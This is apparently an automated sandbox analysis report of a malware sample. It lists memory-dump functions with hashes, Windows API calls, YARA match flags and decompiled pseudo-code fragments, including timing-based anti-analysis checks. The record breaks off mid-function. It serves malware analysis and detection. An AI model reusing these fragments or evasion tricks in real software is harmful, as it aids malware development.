                                                                                                                                    • Instruction Fuzzy Hash: 9490027220108802F1107159C404B4A0009D7E0345F55C45AE441565CD86D5D8A1B561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 8da241fab50686a88139d8aded3de483c0ca00b916344dbd16c08d3ba015ccc2
                                                                                                                                    • Instruction ID: 8268e58e94360c8d8adce895b99587da80e5041fc994cc5dfb712d8b20516a1a
                                                                                                                                    • Opcode Fuzzy Hash: 8da241fab50686a88139d8aded3de483c0ca00b916344dbd16c08d3ba015ccc2
                                                                                                                                    • Instruction Fuzzy Hash: 589002626010004261407169C844D064009FBF1255751C16AE0989554D8599D875AAA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 807c591407c8170649d61b56051640e933db41dff5ef289ae39d80d0fa717746
                                                                                                                                    • Instruction ID: d5498cc2f17c16089dd0d0ecbd55374a13c018eb5cba980de9ee752e04dd6cad
                                                                                                                                    • Opcode Fuzzy Hash: 807c591407c8170649d61b56051640e933db41dff5ef289ae39d80d0fa717746
                                                                                                                                    • Instruction Fuzzy Hash: 0190026221180042F20075698C14F070009D7E0347F51C15EE0145558CC955D871A961
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B797A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 58ad8a44d04975926aa46afc90440db3d9a8859db03e3718f5e1b35811bc2b5e
                                                                                                                                    • Instruction ID: d70f77b73723669d52c95d0c8705d4b72a4e5e899fc9c57453f539984a17cf8d
                                                                                                                                    • Opcode Fuzzy Hash: 58ad8a44d04975926aa46afc90440db3d9a8859db03e3718f5e1b35811bc2b5e
                                                                                                                                    • Instruction Fuzzy Hash: 8390026230100003F14071599418A064009E7F1345F51D05AE0405558CD955D866A662
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 18f0edc980854b9830024ccb12f38e13d4329c5e403b9109f1731769c7f41cc5
                                                                                                                                    • Instruction ID: 3556ae7776520ce2c1a1a999bf29caceaaafe251fc05fbad87a7219fca50ceb4
                                                                                                                                    • Opcode Fuzzy Hash: 18f0edc980854b9830024ccb12f38e13d4329c5e403b9109f1731769c7f41cc5
                                                                                                                                    • Instruction Fuzzy Hash: 5E90026A21300002F18071599408A0A0009D7E1246F91D45EE000655CCC955D879A761
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 421ea1deb41c201aa760d55cc19f66dcf9d514c74fdefbe36c8ba259e5c6fdd1
                                                                                                                                    • Instruction ID: a1a38ed8286d40734e65377907d04c9987db98004c860002c95bf89bde7600f3
                                                                                                                                    • Opcode Fuzzy Hash: 421ea1deb41c201aa760d55cc19f66dcf9d514c74fdefbe36c8ba259e5c6fdd1
                                                                                                                                    • Instruction Fuzzy Hash: 9E90027231114402F1107159C404B060009D7E1245F51C45AE081555CD86D5D8A1B562
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: cd19c23e0f4064b8851573a4325d73dd4e06536a63b1f080e2fd17d27deeb84e
                                                                                                                                    • Instruction ID: 3d368f248dfccf5efc21ef55edc379401aaf70d8016f3887c23ea81c4388e23e
                                                                                                                                    • Opcode Fuzzy Hash: cd19c23e0f4064b8851573a4325d73dd4e06536a63b1f080e2fd17d27deeb84e
                                                                                                                                    • Instruction Fuzzy Hash: 9890027220100402F10075999408A460009D7F0345F51D05AE5015559EC6A5D8A1B571
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00800000, Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: -
                                                                                                                                    • API String ID: 0-2547889144
                                                                                                                                    • Opcode ID: 2f30c9fde44adb42246ffc923b5daf93ac2da44854ed9e3c1b4275d2f5fa375e
                                                                                                                                    • Instruction ID: 93350c5dee2b5ff7469d7ce66aa7b81f19be215ab90ed6fc3b1510e6384b48e7
                                                                                                                                    • Opcode Fuzzy Hash: 2f30c9fde44adb42246ffc923b5daf93ac2da44854ed9e3c1b4275d2f5fa375e
                                                                                                                                    • Instruction Fuzzy Hash: 1411C9B1E0490DEBCB80EBD8C9817ADBBB5FF40308F208089D511EB286C7755A45DF56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00408880, Relevance: .1, Instructions: 92COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E00408880(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406C00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00406E10( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419C90( &_v284, 0x104);
						E0041A300( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413D90(E00413D30(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffdfd5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00406E40( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00406EC0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                                                                                    0x0040888b
                                                                                                                                    0x00408893
                                                                                                                                    0x00408895
                                                                                                                                    0x0040889a
                                                                                                                                    0x0040889f
                                                                                                                                    0x004088b2
                                                                                                                                    0x004088b7
                                                                                                                                    0x004088c0
                                                                                                                                    0x004088cc
                                                                                                                                    0x004088df
                                                                                                                                    0x004088e4
                                                                                                                                    0x004088e7
                                                                                                                                    0x004088f0
                                                                                                                                    0x00408902
                                                                                                                                    0x00408907
                                                                                                                                    0x0040890c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040890e
                                                                                                                                    0x00408912
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00408914
                                                                                                                                    0x00000000
                                                                                                                                    0x00408912
                                                                                                                                    0x00408916
                                                                                                                                    0x00408919
                                                                                                                                    0x0040891f
                                                                                                                                    0x00408921
                                                                                                                                    0x0040892c
                                                                                                                                    0x00408931
                                                                                                                                    0x00408934
                                                                                                                                    0x00408941
                                                                                                                                    0x0040894c
                                                                                                                                    0x0040894e
                                                                                                                                    0x00408954
                                                                                                                                    0x00408958
                                                                                                                                    0x0040895b
                                                                                                                                    0x0040895b
                                                                                                                                    0x00408962
                                                                                                                                    0x00408965
                                                                                                                                    0x0040896a
                                                                                                                                    0x00408977
                                                                                                                                    0x004088a6
                                                                                                                                    0x004088a6
                                                                                                                                    0x004088a6

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 42d0d5b762ed767f255d0158a4eaae86d93edb632e728fa2293ce1f2afc345c0
                                                                                                                                    • Instruction ID: 4c617b39c0906e70e5cb6cd40e0abf5b3059e0cce04910c40f127af8aed32689
                                                                                                                                    • Opcode Fuzzy Hash: 42d0d5b762ed767f255d0158a4eaae86d93edb632e728fa2293ce1f2afc345c0
                                                                                                                                    • Instruction Fuzzy Hash: D221FBB3D4020857DB15E664EE42AFF73AC9B50304F44047FE989A2181F6386B5987A6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 008000E0, Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 767libraryfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 008054E0: NtDelayExecution.NTDLL(00000000,00002710,?,?,00002710), ref: 0080550E
                                                                                                                                    • LoadLibraryW.KERNELBASE(?), ref: 0080020E
                                                                                                                                      • Part of subcall function 00805350: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 008053A8
                                                                                                                                    • CreateFileW.KERNELBASE(00B8006A,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00800883
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile$DelayExecutionLibraryLoad
                                                                                                                                    • String ID: CoCreateInstance$CoInitialize$CoUninitialize
                                                                                                                                    • API String ID: 3867157277-2203488205
                                                                                                                                    • Opcode ID: d6ca3ae58426cf4b632ffe1d798b111aedde8e187175414878b8d949ed992dc9
                                                                                                                                    • Instruction ID: c0f9325fa1629f92cc20576eb33f6674e64504dbe07a78f6adeb7690cd4eddd5
                                                                                                                                    • Opcode Fuzzy Hash: d6ca3ae58426cf4b632ffe1d798b111aedde8e187175414878b8d949ed992dc9
                                                                                                                                    • Instruction Fuzzy Hash: 19720A75A00208EFDB54CB98CD94BAEB7B5FF48304F248198E509AB392D775AE41CF61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00805350, Relevance: 4.6, APIs: 3, Instructions: 56fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 008053A8
                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00000000,01000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,008002C0), ref: 008053C9
                                                                                                                                    • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,008002C0,?), ref: 008053DB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Create$MappingView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1299149932-0
                                                                                                                                    • Opcode ID: d24d2622939d9e5828dc3b76ea277adea0551eb3ce31da15905b81e214a3e5ef
                                                                                                                                    • Instruction ID: 89ba651c0e55e58c44493aaa1eb10dd34170e151cfc04b54f8c262a2a56e622e
                                                                                                                                    • Opcode Fuzzy Hash: d24d2622939d9e5828dc3b76ea277adea0551eb3ce31da15905b81e214a3e5ef
                                                                                                                                    • Instruction Fuzzy Hash: C11133B4E40308BBEB10DBA4DC56FAE7B74EB44710F204555FA14BB2C0D671AB008B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00407068, Relevance: 1.6, APIs: 1, Instructions: 61threadwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E00407068(signed int __eax, void* __ecx, void* _a4, void* _a12) {
				void* _v67;
				void* _v68;
				void* _t14;

				_t14 = 0xa;
				asm("in eax, 0x2e");
				if ((__eax &  *(__ecx - 0x1c)) < 0) goto L4;
			}






                                                                                                                                    0x0040706b
                                                                                                                                    0x0040706d
                                                                                                                                    0x0040706f

                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004070CA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                    • Opcode ID: 4c670c6f0f0cba0d72097344bc608441d6be2fc1ad2328d688a534863a34a0a6
                                                                                                                                    • Instruction ID: 58fff3a35d3351a8a9a8277dcc409a517e909d4cdc6365de26a03027caa90cf1
                                                                                                                                    • Opcode Fuzzy Hash: 4c670c6f0f0cba0d72097344bc608441d6be2fc1ad2328d688a534863a34a0a6
                                                                                                                                    • Instruction Fuzzy Hash: 4801DB31E842157BE720A6909C43FFE776C9B41B54F14415AFA04BA1C1E6A8690687EA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00407070, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00407070(void* __eflags, void* _a4, void* _a12) {
				void* _v67;
				void* _v68;
				void* _t35;

				_t35 = __eflags;
			}






                                                                                                                                    0x00407070

                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004070CA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                    • Opcode ID: b5bfffa0ae5ba930087c66823f96fcbf81121beed5b23f19274be760725c8317
                                                                                                                                    • Instruction ID: 18ef527c81d78d6cf94a666dde549eb5d4912ba5f30213c62aa7d6dc7e6a36c6
                                                                                                                                    • Opcode Fuzzy Hash: b5bfffa0ae5ba930087c66823f96fcbf81121beed5b23f19274be760725c8317
                                                                                                                                    • Instruction Fuzzy Hash: A601A731A8022877E720AA959C43FFF776C9B40B55F04411AFF04BA1C2E6E8790646FA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00800332, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(00B8006A,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00800883
                                                                                                                                      • Part of subcall function 008054E0: NtDelayExecution.NTDLL(00000000,00002710,?,?,00002710), ref: 0080550E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDelayExecutionFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3343200621-0
                                                                                                                                    • Opcode ID: ba2aed7be88c328491b47c092958357f24f5995f2ab93a4103c8a5492d60c929
                                                                                                                                    • Instruction ID: 3344dcf5f535cfde90c65b9d4b447e31116bed435a3e9c732291000d6fade39d
                                                                                                                                    • Opcode Fuzzy Hash: ba2aed7be88c328491b47c092958357f24f5995f2ab93a4103c8a5492d60c929
                                                                                                                                    • Instruction Fuzzy Hash: 85F01D74D04209A6EB609BA8CC96BAEBB70FF05724F304618EA55BB2C2D37059C08B84
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004185E1, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                    			E004185E1(void* __edx, intOrPtr _a12, WCHAR* _a16, WCHAR* _a20, struct _LUID* _a24) {
				int _t13;
				void* _t19;
				signed int _t23;

				_t23 =  *[cs:esi+0x6f] * 0xce5ce4ad;
				asm("adc [ebp-0x75], dl");
				_push(_t23);
				_t10 = _a12;
				E00418D80(_t19, _a12, _a12 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a16, _a20, _a24); // executed
				return _t13;
			}






                                                                                                                                    0x004185e2
                                                                                                                                    0x004185ef
                                                                                                                                    0x004185f0
                                                                                                                                    0x004185f3
                                                                                                                                    0x0041860a
                                                                                                                                    0x00418620
                                                                                                                                    0x00418624

                                                                                                                                    APIs
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF72,0040CF72,00000041,00000000,?,00408B35), ref: 00418620
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                    • Opcode ID: 1454166cf54bd9e695c0c9c56f3f4fd20ae242d74a2e1dfd25114fe0c1d67130
                                                                                                                                    • Instruction ID: a86059d8fe74c016f6871b1c432d8a636e0a54daf57ab58ab36152e98efd018e
                                                                                                                                    • Opcode Fuzzy Hash: 1454166cf54bd9e695c0c9c56f3f4fd20ae242d74a2e1dfd25114fe0c1d67130
                                                                                                                                    • Instruction Fuzzy Hash: 8BF0A0B6200204AFC710DF54DC82EE77BA9AF49314F148559FA199B641C530A811CBF5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00418417, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AC3,?,?,00408AC3,00000060,00000000,00000000,?,?,00408AC3,?,00000000), ref: 004184BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                    • Opcode ID: 11f0ff7c054bbd822d4e58abb4db6e68b345ddee36eddc940ef3af2baa80afd8
                                                                                                                                    • Instruction ID: 1d2de598d1c5646c1e9a6e5f2c7f6532ce64b521e13c117375f07bc636b1e87b
                                                                                                                                    • Opcode Fuzzy Hash: 11f0ff7c054bbd822d4e58abb4db6e68b345ddee36eddc940ef3af2baa80afd8
                                                                                                                                    • Instruction Fuzzy Hash: F6E0DFB80006884FDB24EE29D8C1C9B3795BF812147108B8EE84847203C931D89B8AA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 30%
                                                                                                                                    			E00418490(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* _a4, void* _a8, long _a12, void* _a16) {
				void* _v3;
				char _t15;
				void* _t22;

				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
				E00418D80(_t22);
				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t15;
			}






                                                                                                                                    0x00418495
                                                                                                                                    0x004184a4
                                                                                                                                    0x004184a7
                                                                                                                                    0x004184bd
                                                                                                                                    0x004184c1

                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AC3,?,?,00408AC3,00000060,00000000,00000000,?,?,00408AC3,?,00000000), ref: 004184BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                    • Instruction ID: 03c2f956527c42d7b276241e6fe07b9733b4616027d909c5946ae0997d1efc6f
                                                                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                    • Instruction Fuzzy Hash: 4EE01AB12002086BD714EF59DC45EA777ACAF88750F014559F90857241C630E9108AF0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004185F0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418D80(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                    0x0041860a
                                                                                                                                    0x00418620
                                                                                                                                    0x00418624

                                                                                                                                    APIs
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF72,0040CF72,00000041,00000000,?,00408B35), ref: 00418620
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                    • Instruction ID: 86199f88c9bc95069a3839d85b69f3b768b26ac3f426fe44f4acef71e1d37d6b
                                                                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                    • Instruction Fuzzy Hash: 75E01AB12002086BDB10EF49DC85EE737ADAF89650F018159FA0857241C934E8108BF5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004184C3, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 21%
                                                                                                                                    			E004184C3(int _a3) {
				intOrPtr _v1;
				void* _t10;

				asm("sbb dl, al");
				asm("adc ch, [edx+0x68bcb5f9]");
				asm("into");
				asm("repe pop es");
				_push(_t13);
				_t5 = _v1;
				E00418D80(_t10, _v1, _v1 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a3);
			}





                                                                                                                                    0x004184c3
                                                                                                                                    0x004184c5
                                                                                                                                    0x004184cb
                                                                                                                                    0x004184cd
                                                                                                                                    0x004184d0
                                                                                                                                    0x004184d3
                                                                                                                                    0x004184ea
                                                                                                                                    0x004184f8

                                                                                                                                    APIs
                                                                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 004184F8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                    • Opcode ID: 6de5ac764000c4e9bb8b95c1067492e9330fcaa6220ffcf6c18deff1d6271ed0
                                                                                                                                    • Instruction ID: e881ae48bd55e539a507e6a13a7ee9f5f7680d82345e8bbb2732230f62c0f066
                                                                                                                                    • Opcode Fuzzy Hash: 6de5ac764000c4e9bb8b95c1067492e9330fcaa6220ffcf6c18deff1d6271ed0
                                                                                                                                    • Instruction Fuzzy Hash: 2BE08C752002047BC620EB698C96FD77BAC9F4A790F448098FD186B682C935BA04C7E1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004184D0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
